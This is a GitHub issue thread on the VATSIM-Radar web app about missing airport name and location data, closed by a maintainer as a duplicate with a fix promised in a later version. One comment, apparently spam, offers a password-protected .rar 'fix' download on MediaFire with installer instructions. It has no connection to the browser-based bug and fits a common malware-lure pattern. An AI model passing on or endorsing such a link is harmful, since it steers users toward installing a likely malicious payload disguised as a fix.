### ISSUE TITLE
Missing data on airports tab

### ISSUE THREAD

**Issue by Adrian2k** [VATSIM-Radar/vatsim-radar#302] opened 2024-08-26 22:21 UTC
### Your Vatsim CID

1339353

### Radar version

v0.4.3-1

### Describe your issue

Selecting an airport, for example ENBR will show no info under name or location.

![image](https://github.com/user-attachments/assets/bec7ae42-1a59-45ca-bc65-b7f82f96ba5b)

### Reproduction steps

Click on an airport > Go to info & weather tab

### Platform

Windows > Arc browser 1.16.2 (45303)

### Validation

- [X] I have searched for other issues and didn't found any alike
- [X] I have also checked roadmap, and this is not planned

**Comment by AMSNX** [comment] 2024-08-27 00:41
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by daniluk4000** [comment] 2024-08-27 07:32
Duplicate of https://github.com/VATSIM-Radar/vatsim-radar/issues/176, fix will be available in 0.4.4

**Closed by daniluk4000** 2024-08-27 07:32 UTC
Labels: bug, pending triage
